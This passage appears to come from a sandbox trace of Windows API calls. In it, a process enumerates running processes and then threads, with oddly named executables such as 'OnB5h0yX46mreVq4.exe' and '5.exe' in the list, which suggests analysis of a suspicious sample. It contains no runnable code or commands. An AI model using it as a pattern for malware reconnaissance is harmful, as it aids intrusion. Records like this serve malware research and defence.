RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.597] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.599] GetTickCount () returned 0x11725c5 [0175.599] GetCurrentThreadId () returned 0xab0 [0175.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.599] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0175.601] GetTickCount () returned 0x11725c5 [0175.601] GetCurrentThreadId () returned 0xab0 [0175.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.601] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.602] GetTickCount () returned 0x11725c5 [0175.602] GetCurrentThreadId () returned 0xab0 [0175.603] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.603] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.603] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0175.604] GetTickCount () returned 0x11725c5 [0175.604] GetCurrentThreadId () returned 0xab0 [0175.604] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.604] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.606] GetTickCount () returned 0x11725c5 [0175.606] GetCurrentThreadId () returned 0xab0 [0175.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.606] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x414, pcPriClassBase=13, dwFlags=0x0, szExeFile="OnB5h0yX46mreVq4.exe")) returned 1 [0175.608] GetTickCount () returned 0x11725c5 [0175.608] GetCurrentThreadId () returned 0xab0 [0175.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.608] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0175.609] GetTickCount () returned 0x11725c5 [0175.609] GetCurrentThreadId () returned 0xab0 [0175.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.610] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa64, pcPriClassBase=13, dwFlags=0x0, szExeFile="OnB5h0yX46mreVq4.exe")) returned 1 [0175.611] GetTickCount () returned 0x11725c5 [0175.611] GetCurrentThreadId () returned 0xab0 [0175.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.611] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1ac, pcPriClassBase=13, dwFlags=0x0, szExeFile="LogonUI.exe")) returned 1 [0175.612] GetTickCount () returned 0x11725c5 [0175.612] GetCurrentThreadId () returned 0xab0 [0175.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.612] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 1 [0175.613] GetTickCount () returned 0x11725d4 [0175.613] GetCurrentThreadId () returned 0xab0 [0175.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.614] Process32Next (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x6c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="5.exe")) returned 0 [0175.614] GetTickCount () returned 0x11725d4 [0175.614] Thread32First (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.616] GetCurrentThreadId () returned 0xab0 [0175.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.616] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.617] GetTickCount () returned 0x11725d4 [0175.617] GetCurrentThreadId () returned 0xab0 [0175.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.617] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.618] GetTickCount () returned 0x11725d4 [0175.618] GetCurrentThreadId () returned 0xab0 [0175.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.618] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.620] GetTickCount () returned 0x11725d4 [0175.620] GetCurrentThreadId () returned 0xab0 [0175.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.620] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.621] GetTickCount () returned 0x11725d4 [0175.622] GetCurrentThreadId () returned 0xab0 [0175.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.622] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.623] GetTickCount () returned 0x11725d4 [0175.623] GetCurrentThreadId () returned 0xab0 [0175.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.623] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.625] GetTickCount () returned 0x11725d4 [0175.625] GetCurrentThreadId () returned 0xab0 [0175.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.625] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.627] GetTickCount () returned 0x11725d4 [0175.627] GetCurrentThreadId () returned 0xab0 [0175.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.627] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.629] GetTickCount () returned 0x11725e4 [0175.629] GetCurrentThreadId () returned 0xab0 [0175.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.629] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.630] GetTickCount () returned 0x11725e4 [0175.630] GetCurrentThreadId () returned 0xab0 [0175.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.630] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.631] GetTickCount () returned 0x11725e4 [0175.631] GetCurrentThreadId () returned 0xab0 [0175.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.631] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.632] GetTickCount () returned 0x11725e4 [0175.632] GetCurrentThreadId () returned 0xab0 [0175.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.632] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.633] GetTickCount () returned 0x11725e4 [0175.633] GetCurrentThreadId () returned 0xab0 [0175.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.634] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.635] GetTickCount () returned 0x11725e4 [0175.635] GetCurrentThreadId () returned 0xab0 [0175.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.635] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.636] GetTickCount () returned 0x11725e4 [0175.636] GetCurrentThreadId () returned 0xab0 [0175.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.636] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.637] GetTickCount () returned 0x11725e4 [0175.637] GetCurrentThreadId () returned 0xab0 [0175.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.637] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.638] GetTickCount () returned 0x11725e4 [0175.638] GetCurrentThreadId () returned 0xab0 [0175.638] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.638] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.639] GetTickCount () returned 0x11725e4 [0175.639] GetCurrentThreadId () returned 0xab0 [0175.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.639] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.640] GetTickCount () returned 0x11725e4 [0175.640] GetCurrentThreadId () returned 0xab0 [0175.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.640] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.641] GetTickCount () returned 0x11725e4 [0175.641] GetCurrentThreadId () returned 0xab0 [0175.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.642] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.642] GetTickCount () returned 0x11725e4 [0175.642] GetCurrentThreadId () returned 0xab0 [0175.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.643] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.643] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.644] GetTickCount () returned 0x11725f4 [0175.644] GetCurrentThreadId () returned 0xab0 [0175.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.644] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.645] GetTickCount () returned 0x11725f4 [0175.645] GetCurrentThreadId () returned 0xab0 [0175.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.645] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.646] GetTickCount () returned 0x11725f4 [0175.646] GetCurrentThreadId () returned 0xab0 [0175.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.646] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.646] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.647] GetTickCount () returned 0x11725f4 [0175.647] GetCurrentThreadId () returned 0xab0 [0175.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.647] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.648] GetTickCount () returned 0x11725f4 [0175.648] GetCurrentThreadId () returned 0xab0 [0175.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.649] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.649] GetTickCount () returned 0x11725f4 [0175.649] GetCurrentThreadId () returned 0xab0 [0175.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.650] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.650] GetTickCount () returned 0x11725f4 [0175.651] GetCurrentThreadId () returned 0xab0 [0175.651] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.651] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.652] GetTickCount () returned 0x11725f4 [0175.652] GetCurrentThreadId () returned 0xab0 [0175.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.652] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.653] GetTickCount () returned 0x11725f4 [0175.653] GetCurrentThreadId () returned 0xab0 [0175.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.653] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.655] GetTickCount () returned 0x11725f4 [0175.655] GetCurrentThreadId () returned 0xab0 [0175.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.655] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.656] GetTickCount () returned 0x11725f4 [0175.656] GetCurrentThreadId () returned 0xab0 [0175.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.657] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.658] GetTickCount () returned 0x11725f4 [0175.658] GetCurrentThreadId () returned 0xab0 [0175.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.658] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.660] GetTickCount () returned 0x1172603 [0175.660] GetCurrentThreadId () returned 0xab0 [0175.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.660] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.661] GetTickCount () returned 0x1172603 [0175.661] GetCurrentThreadId () returned 0xab0 [0175.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.662] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.663] GetTickCount () returned 0x1172603 [0175.663] GetCurrentThreadId () returned 0xab0 [0175.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.663] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.664] GetTickCount () returned 0x1172603 [0175.664] GetCurrentThreadId () returned 0xab0 [0175.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.664] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.665] GetTickCount () returned 0x1172603 [0175.665] GetCurrentThreadId () returned 0xab0 [0175.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.665] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.666] GetTickCount () returned 0x1172603 [0175.666] GetCurrentThreadId () returned 0xab0 [0175.666] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.667] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.668] GetTickCount () returned 0x1172603 [0175.668] GetCurrentThreadId () returned 0xab0 [0175.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.668] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.669] GetTickCount () returned 0x1172603 [0175.669] GetCurrentThreadId () returned 0xab0 [0175.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.669] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.669] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.670] GetTickCount () returned 0x1172603 [0175.670] GetCurrentThreadId () returned 0xab0 [0175.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.670] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.671] GetTickCount () returned 0x1172603 [0175.671] GetCurrentThreadId () returned 0xab0 [0175.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.671] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.672] GetTickCount () returned 0x1172603 [0175.672] GetCurrentThreadId () returned 0xab0 [0175.672] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.672] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.672] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.673] GetTickCount () returned 0x1172603 [0175.673] GetCurrentThreadId () returned 0xab0 [0175.673] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.673] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.673] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.674] GetTickCount () returned 0x1172603 [0175.674] GetCurrentThreadId () returned 0xab0 [0175.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.674] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.675] GetTickCount () returned 0x1172603 [0175.675] GetCurrentThreadId () returned 0xab0 [0175.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.675] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.675] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.676] GetTickCount () returned 0x1172613 [0175.676] GetCurrentThreadId () returned 0xab0 [0175.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.676] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.677] GetTickCount () returned 0x1172613 [0175.677] GetCurrentThreadId () returned 0xab0 [0175.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.677] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.678] GetTickCount () returned 0x1172613 [0175.678] GetCurrentThreadId () returned 0xab0 [0175.678] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.678] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.679] GetTickCount () returned 0x1172613 [0175.679] GetCurrentThreadId () returned 0xab0 [0175.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.679] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.680] GetTickCount () returned 0x1172613 [0175.680] GetCurrentThreadId () returned 0xab0 [0175.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.680] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.680] Thread32Next (hSnapshot=0x6ec, lpte=0xa13f434) returned 1 [0175.681] GetTickCount () returned 0x1172613 [0175.681] 